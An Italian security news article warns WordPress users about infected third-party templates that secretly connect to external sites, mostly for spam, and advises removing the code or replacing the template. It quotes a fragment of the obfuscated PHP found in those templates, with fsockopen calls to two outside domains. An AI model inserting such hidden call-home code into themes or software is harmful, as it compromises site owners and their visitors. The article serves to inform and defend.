Attenzione ai template di WordPress

di Stefano Besana

Pubblicato 7 Febbraio 2008
Aggiornato 12 Febbraio 2018 20:49

logo PMI+ logo PMI+

WordPress è un CMS gratuito che permette la creazione, amministrazione e fruizione, di piattaforme blog: il network OneBlog è un esempio delle enormi potenzialità di questa applicazione pluripremiata e tanto amata nell’ambito web. Ma come sappiamo, non sempre, sarebbe bene dire quasi mai, le buone applicazioni sono esentate dai rischi e dalle problematiche.

In questo caso si tratta dell’utilizzo di template offerti da terze parti, e quindi da siti web non bene identificati e soprattutto non ufficiali.
I rischi variano a seconda della minaccia inserita nel template, ma si tratta, generalmente, di questioni legate allo spamming.

La notizia è apparsa in diversi blog compreso OneCMS e forum dedicati alla sicurezza di WordPress; non ultimo il forum di WordPress Italia.
In sostanza il problema sarebbe relativo alla connessione non autorizzata a siti esterni.
Il codice dei template infetti rivela, ad un esame accurato stringhe di questo tipo:

if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com"
, 80, $R32D00070D4FFBCCE2FC669BBA812D4C2,
$R5F525F5B398DADD7CF0784BD406298E3, 3)) {
$R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr";
}
elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com"
, 80, $R32D00070D4FFBCCE2FC669BBA812D4C2,
$R5F525F5B398DADD7CF0784BD406298E3, 3)) {
$R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc";
}
[...]

La soluzione? Sicuramente quella di controllare il template e sopratutto la fonte dalla quale lo si scarica e di informarsi, come sempre, adeguatamente prima di procedere all’utilizzo.
Nel caso scopriate poi di essere i possessori di uno dei blog infetti, non vi resta che rimuovere le porzioni di codice malevolo dal vostro template oppure sostituire lo stesso con qualcosa di più affidabile. In questi casi l’unica soluzione possibile pare essere proprio questa.